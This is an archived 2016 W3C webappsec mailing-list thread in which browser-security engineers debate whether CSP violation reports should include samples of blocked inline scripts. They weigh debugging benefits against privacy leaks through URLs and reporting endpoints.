Re: CSP reports: `script-sample` from Artur Janc on 2016-10-19 (public-webappsec@w3.org from October 2016)

From: Artur Janc <aaj@google.com>
Date: Wed, 19 Oct 2016 21:46:13 +0200
To: Brad Hill <hillbrad@gmail.com>
Cc: Craig Francis <craig.francis@gmail.com>, Krzysztof Kotowicz <kkotowicz@gmail.com>, Mike West <mkwst@google.com>, Devdatta Akhawe <dev.akhawe@gmail.com>, "public-webappsec@w3.org" <public-webappsec@w3.org>, Christoph Kerschbaumer <ckerschbaumer@mozilla.com>, Frederik Braun <fbraun@mozilla.com>, Scott Helme <scotthelme@hotmail.com>, Lukas Weichselbaum <lwe@google.com>, Michele Spagnuolo <mikispag@google.com>, Jochen Eisinger <eisinger@google.com>
Message-ID: <CAPYVjqr5fgdMSbiOqE_VvhXcgu_D7teRixw0xBe3Fn4_2PHwkg@mail.gmail.com>
On Wed, Oct 19, 2016 at 7:14 PM, Brad Hill <hillbrad@gmail.com> wrote:

> Just to add my comment after discussion on today's teleconference:
>
> I'm sympathetic to the argument that "you must trust your reporting
> endpoint" for inline scripts and event handlers.
>
> I'm concerned about it for non-same origin external scripts.  There are
> lots of "guarded" JSONP like endpoints that I imagine have PII in the first
> 40 chars, e.g., something like the following where u is a userid:
>
> for(;;);{u:21482823,  ...
>
> Allowing any cross-origin endpoint to request this response and dump it to
> a reporting endpoint of their choice would be very bad.
>

Yes, totally! What we were talking about earlier is reporting script
samples for "inline" script violations such as event handlers and inline
<script> blocks -- this is data which the developer can already access by
inspecting the DOM (though in some cases it can be difficult if the element
has already been removed). The main benefit of having it done by the user
agent is robustness and not requiring the developer to load a "CSP
debugging" library everywhere on their site.

FWIW I'd be strongly opposed to doing this for external scripts because of
the problem you're talking about. Luckily, we generally don't need this for
external scripts because they can already be identified by the blocked-uri,
unlike inline violations.

>
> -Brad
>
> On Wed, Oct 19, 2016 at 8:21 AM Craig Francis <craig.francis@gmail.com>
> wrote:
>
>> On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote:
>>
>> URLs should not contain sensitive data, precisely because they are often
>> relayed to third parties
>>
>>
>>
>> Hi Krzysztof,
>>
>> While I agree, the classic example is a password reset.
>>
>> As in, a link is sent to the user via email, and that link contains a
>> sensitive token that allows someone to change the account password.
>>
>> That said, the token should not last long to deduce the risk of it being
>> exposed to 3rd parties (e.g. expiring it after use, or a certain period of
>> time).
>>
>> Craig
>>
>>
>>
>>
>>
>>
>> On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote:
>>
>>
>>
>> 2016-10-19 2:16 GMT+02:00 Artur Janc <aaj@google.com>:
>>
>> On Tue, Oct 18, 2016 at 10:05 AM, Mike West <mkwst@google.com> wrote:
>>
>> On Tue, Oct 18, 2016 at 1:03 AM, Artur Janc <aaj@google.com> wrote:
>>
>> On Mon, Oct 17, 2016 at 7:15 PM, Devdatta Akhawe <dev.akhawe@gmail.com>
>> wrote:
>>
>> Hey
>>
>> In the case of a third-party script having an error, what are example
>> leaks you are worried about?
>>
>>
>> The same kinds of issues that lead us to sanitize script errors for
>> things loaded as CORS cross-origin scripts: https://html.spec.
>> whatwg.org/#muted-errors. If the resource hasn't opted-in to being
>> same-origin with you, script errors leak data you wouldn't otherwise have
>> access to.
>>
>>
>> Thanks for the summary, Mike! It's a good overview of the issue, but I'd
>> like to expand on the reasoning for why including the prefix of an inline
>> script doesn't sound particularly scary to me.
>>
>>
>> Thanks for fleshing out the counterpoints, Artur!
>>
>>
>> Basically, in order for this to be a concern, all of the following
>> conditions need to be met:
>>
>> 1. The application has to use untrusted report collection infrastructure.
>> If that is the case, the application is already leaking sensitive data from
>> page/referrer URLs to its collector.
>>
>>
>> "trusted" to receive URLs doesn't seem to directly equate to "trusted" to
>> store sensitive data. If you're sure that you don't have sensitive data on
>> your pages, great. But you were also presumably "sure" that you didn't have
>> inline script on your pages, right? :)
>>
>>
>> Keep in mind that URLs are sensitive data for most applications and they
>> are currently being sent in violation reports.
>>
>>
>> URLs should not contain sensitive data, precisely because they are often
>> relayed to third parties in e.g. referrer. If they do, that's usually
>> considered a vulnerability by e.g. OWASP, especially if the URL is
>> capability bearing (IDOR
>> <https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References>
>> is even in OWASP Top 10). I agree that some applications disclose sensitive
>> information in URLs, but that's should not be the majority of them. I think
>> that for a lot of applications URLs reported through e.g. CSP violation
>> reports are still subject to regular access control, whereas we just don't
>> know yet if sensitive tokens are not included in script samples. It's
>> likely some IDs are present in the inline scripts <a href=#
>> oncllick=a.select(123)>
>>
>> The password reset example Craig is talking about is a fairly ubiquitous
feature which generally needs to pass sensitive data in the URL for
compatibility with email clients. Also, capability URLs are a thing in a
lot of apps (e.g. Google Docs), and so are various features which reveal
the identity of the current user (/profile/koto).

But even without direct leaks of PII and SPII, URLs contain a lot of data
about the current user, the data they have in the given application, and
their interactions with the app. For example, a search engine is likely to
disclose your queries, a social network will leak the IDs of your friends
and groups you belong to, a mapping site will have your location, and even
a news site will disclose the articles you read, which are sensitive in
certain contexts.

This is difficult to definitively prove, but I'd say that claiming that an
application doesn't have any interesting/sensitive data in its URLs would
be an exception rather than the norm. But I'm not sure how to convince you
other than letting you pick some interesting apps and trying to find
interesting stuff in their URLs ;-)

Cheers,
-A


>
>>
>> I'm having a difficult time imagining a case where an application is okay
>> with disclosing their URLs to a third-party for the purpose of debugging
>> violation reports, and is not okay with disclosing script prefixes for the
>> same purpose, given that:
>> 1) Almost all applications have sensitive data in URLs, compared to a
>> certainly real, but less specific risk of having inline scripts with
>> sensitive data in its prefix, assuming it's limited to a reasonable length.
>>
>>
>> Citation needed (for the "almost all" claim). I agree the risk of leaking
>> sensitive date might be mitigated by adding a reasonable length limit.
>>
>> 2) URLs are disclosed much more frequently than script samples would be,
>> because they are sent with every report (not just "inline" script-src
>> violations). In the `referrer` field, the UA is also sending a URL of
>> another, unrelated page, increasing the likelihood that sensitive data will
>> appear in the report.
>>
>>
>> Which is why it's a best practice not to have sensitive data in URLs, but
>> instead e.g. using cookies or POST parameters to transfer them.
>>
>>
>> 3) There is no sanitization of URL parameters in violation reports,
>> compared to the prefixing logic we're considering for script samples.
>>
>>
>> In fact, I'd be much more worried about URLs than script prefixes,
>> because URLs leak on *any* violation (not just for script-src) and URLs
>> frequently contain PII or authorization/capability-bearing tokens e.g
>> for password reset functionality.
>>
>>
>> We've talked a bit about URL leakage in https://github.com/w3c/
>> webappsec-csp/issues/111. I recall that Emily was reluctant to apply
>> referrer policy to the page's URL vis a vis the reporting endpoint, but I
>> still think it might make sense.
>>
>>
>> 2. The application needs to have a script which includes sensitive user
>> data somewhere in the first N characters. FWIW in our small-scale analysis
>> of a few hundred thousand reports we saw ~300 inline script samples sent
>> by Firefox (with N=40) and haven't found sensitive tokens in any of the
>> snippets.
>>
>>
>> Yup. I'm reluctant to draw too many conclusions from that data, given the
>> pretty homogeneous character of the sites we're currently applying CSP to
>> at Google, but I agree with your characterization of the data.
>>
>> Scott might have more data from a wider sampling of sites, written by a
>> wider variety of engineering teams (though it's not clear that the terms of
>> that site would allow any analysis of the data).
>>
>>
>> I completely agree, this data is just what we had readily available -- we
>> can certainly do a much larger analysis of script prefixes based on the
>> search index. That said, if we're worried about the script-sample approach,
>> perhaps not seeing any sensitive data in the first dataset we looked at
>> could be a signal that it's worth pursuing further.
>>
>> 3. The offending script needs to cause a CSP violation, i.e. not have a
>> valid nonce, meaning that the application is likely broken if the policy is
>> in enforcing mode.
>>
>>
>> 1. Report mode exists.
>>
>> 2. Embedded enforcement might make it more likely that XSS on a site
>> could cause policy to be inadvertantly applied to itself or its
>> dependencies. We talked about this briefly last week, and I filed
>> https://github.com/w3c/webappsec-csp/issues/126 to ponder it. :)
>>
>>
>> Since CSPs applied by embedded enforcement serve a very different purpose
>> than current policies (they don't try to mitigate script injection), it
>> would very likely be okay to just not include script-sample data for such
>> policies. Also, embedded enforcement is still pretty far off, and the
>> reporting problem is an issue for pretty much every site currently
>> gathering violation reports; we should probably weigh the value of fixing
>> CSP reporting accordingly.
>>
>>
>> As a security engineer, I would consider #1 to be the real security
>> boundary -- a developer should use a CSP collector she trusts because
>> otherwise, even without script-sample, reports contain data that can
>> compromise the application.
>>
>>
>> That sounds like an argument for reducing the amount of data in reports,
>> not for increasing it. I think it's somewhat rational to believe that
>> reporting endpoints are going to have longer retention times and laxer
>> retention policies than application databases. Data leaking from the latter
>> into the former seems like a real risk. I agree that the URL itself already
>> presents risks, but I don't understand how that's a justification for
>> accepting more risk.
>>
>>
>> It is an argument for using trusted infrastructure when building your
>> application ;-) Developers are already accustomed to deciding whether to
>> place trust in various components of their apps, whether it's the hosting
>> platform and OS, server-side modules and libraries, or JS widgets and other
>> embedded resources. A CSP violation endpoint is currently a
>> security-critical part of an application because it receives URLs; people
>> who don't trust their collection infrastructure already have insecure
>> applications and adding script-sample to reports does little to change
>> this. (Note that this wouldn't hold for applications which have nothing
>> sensitive in URLs and embed sensitive data at the beginning of inline
>> scripts, but this doesn't seem like a common pattern.)
>>
>> Basically, the reluctance to include relevant debugging information in
>> the violation report seems to be somewhat of a misplaced concern to me,
>> because it ignores the trust relationship the application owner must
>> already have with their report collection endpoint.
>>
>> Perhaps it's pertinent to take a step back and think about the reason to
>> have reporting functionality in CSP in the first place -- after all, the
>> mechanism could certainly work only via throwing SecurityPolicyViolation
>> events and requiring developers to write their own logging code. The fact
>> that this capability exists in UAs, and is not restricted to sending
>> reports to the same origin or same "base domain" (contrary to the original
>> proposals, e.g. in http://research.sidstamm.com/papers/csp-www2010.pdf)
>> indicates that CSP wants to be flexible and give developers ultimate
>> control over the reporting functionality. Given this design choice, it
>> seems okay to trust the developer to pick the right report URI for their
>> application and include useful debugging data if the developer wants it; in
>> a way, the status quo is the worst of both worlds, because it already
>> requires the developer to fully trust the collector, but doesn't give her
>> enough useful data to track down causes of violations.
>>
>> In case it helps: Lukas ran a quick analysis of the report-uri values
>> we've seen in the wild, and e.g. for the domains with CSP in Alexa 100,000
>> we see the following:
>> - 49% don't set a report-uri
>> - 29% have a report-uri pointing to a relative path (/foo)
>> - 10% have a report-uri pointing to the same origin, with another 1%
>> using a sibling subdomain (foo.example.org reporting to csp.example.org)
>>
>> Out of the remaining ~10% which send violations to external URLs, about
>> half point to report-uri.io and a couple of other logging services, and
>> the rest seems to use another domain owned by the same person/organization,
>> e.g. vine.co sends reports to twitter.com. The data for all domains in
>> our set isn't substantially different (66% without report-uri; 24%
>> reporting to own domain; 10% externally). This data doesn't include all the
>> Google ccTLDs and a couple of other big providers, and I'm sure it's
>> missing some other domains, e.g. ones with CSP in parts of the site
>> requiring authentication, but AFAIK it shouldn't have a systematic bias
>> otherwise.
>>
>> I can easily imagine scripts that violate conditions #2 and #3, but at
>> the same time we have not seen many examples of such scripts so far, nor
>> have people complained about the script-sample data already being included
>> by Firefox (AFAIK).
>>
>>
>> People are generally unlikely to complain about getting more data,
>> especially when the data's helpful and valuable. That can justify pretty
>> much anything, though: lots of people think CORS is pretty restrictive, for
>> instance, and probably wouldn't be sad if we relaxed it in various ways.
>>
>>
>> Overall, I don't see the gathering of script samples as qualitatively
>> different to the collection of URLs. However, if we are indeed particularly
>> worried about script snippets, we could make this opt-in and enable the
>> functionality only in the presence of a new keyword (report-uri /foo
>> 'report-script-samples') and add warnings in the spec to explain the
>> pitfalls. This way even if I'm wrong about all of the above we would not
>> expose any data from existing applications.
>>
>>
>> I suspect that such an option would simply be copy-pased into new
>> policies, but yes, it seems like a reasonable approach.
>>
>>
>> For some background about why we're even talking about this: currently
>> violation reports are all but useless for both debugging and detection of
>> the exploitation of XSS due to the noise generated by browser extensions.
>>
>>
>> I agree that this is a problem that we should solve. One way of solving
>> it is to add data to the reports. Another is to invest more in cleaning up
>> the reports that you get so that there's less noise. I wish browser vendors
>> (including Chrome) spent more time on the latter, as we're actively harming
>> users by not doing so.
>>
>>
>> Yes, fixing the blocking and reporting of extension-injected scripts
>> would certainly help (although note that "less noise" likely isn't
>> sufficient, it really has to be zero noise), but IIRC prior discussions
>> we've had about the topic indicated that this is an almost intractable
>> problem, so it would be great to find alternative solutions.
>>
>> The script sample approach also has several important advantages because
>> even without extension-related false positives, developers would have very
>> little information about the actual cause of inline script violations
>> (which are the majority of possible CSP problems in nonce-based policies).
>> Sending some of the script text not only makes it possible to discard all
>> spurious reports, but also gives the developer the crucial bit of data to
>> find and fix actual site errors; it seems like a workable solution to the
>> current reporting problems faced by many sites.
>>
>> Cheers,
>> -Artur
>>
>>
>>
>>
>> --
>> Best regards,
>> Krzysztof Kotowicz
>>
>>
>>
Received on Wednesday, 19 October 2016 19:47:10 UTC